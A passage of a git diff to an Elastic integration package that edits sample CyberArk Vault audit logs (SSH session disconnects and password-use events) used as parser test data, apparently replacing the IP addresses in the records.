System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n 
Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:34:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 
2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\n PSM Disconnect\n \n \n \n \n \n 
\n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;","Message":"PSM 
Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/308_use_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/308_use_password.log
index 8c77aabf909..3f7c5f3a332 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/308_use_password.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/308_use_password.log
@@ -1,11 +1,11 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 308\n Use Password\n Info\n adm2\n Use Password\n \n \n Windows\n Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\n 10.2.0.6\n \n \n \n (Action: Connect)\n \n Use Password\n 10.2.0.3\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"308","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Use Password","Severity":"Info","Issuer":"adm2","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"Windows","File":"Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2","Station":"10.2.0.6","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)","ExtraDetails":"","Message":"Use Password","GatewayStation":"10.2.0.3","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WIN-SERVER-LOCAL"},{"Name":"UserName","Value":"Administrator2"},{"Name":"Address","Value":"dbserver.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"LogonDomain","Value":"DBServer"},{"Name":"SequenceID","Value":"1"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"LastSuccessReconciliation","Value":"1604944215"},{"Name":"Customer","Value":"EvilCorp"}]}}}} -<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:27Z 
VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
